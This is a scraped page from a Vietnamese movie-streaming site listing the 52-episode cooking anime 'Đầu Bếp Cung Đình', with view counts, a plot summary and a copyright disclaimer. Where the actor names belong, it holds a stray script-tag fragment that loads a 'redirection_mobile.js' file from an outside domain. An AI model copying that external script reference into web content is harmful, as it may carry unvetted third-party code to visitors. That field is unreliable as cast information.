xem phim dau bep cung dinh tm online, download Đầu Bếp Cung Đình (TM) 52/52 hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Đầu Bếp Cung Đình (TM) 52/52 - phim hoat hinh
dau bep cung dinh tm

Đầu Bếp Cung Đình (TM) 52/52

,

52 episodes | Luot Xem: 1497617   |  0 |  
Dien Vien: src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim
Thể Loại: Chế biến món ăn, so tài, tình cảm
Nội Dung:Tiểu đầu bếp cung đình là một bộ Anime hay về ẩm thực. Nhân vật chínhcủa phim là Lưu Mậu Tinh, hay còn gọi là , một cậu bé 13 tuổi có quyếttâm sáng tạo và tìm tòi những bí quyết độc đáo nhất để tạo ra những mónăn ngon, phục vụ thực khách. Trên bước đường phiêu lưu học hỏi củamình, Mậu Tinh đã gặp nhiều đối thủ, và nhiều trong số đó sau này đãtrở thành bạn của Mậu Tinh, đồng hành cùng Mậu Tinh trong cuộc chiếnchống giới ẩm thực đen, một tổ chức lợi dụng các món ăn để thôn tínhmọi người. Xuyên suốt bộ phim là cuộc hành trình vươn đến những đỉnhcao trong nghề nấu nướng của Mậu Tinh, là cuộc chiến trường kỳ giữa MậuTinh cùng những người bạn và giới ẩm thực đen. Đây là một bộ phim về ẩmthực rất đáng để xem, tình tiết hấp dẫn, vui nhộn và cũng rất tình cảm.

Phim cùng thể loại - Similar movies
View: 1497618
View: 76219
View: 280432
View: 1489629
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung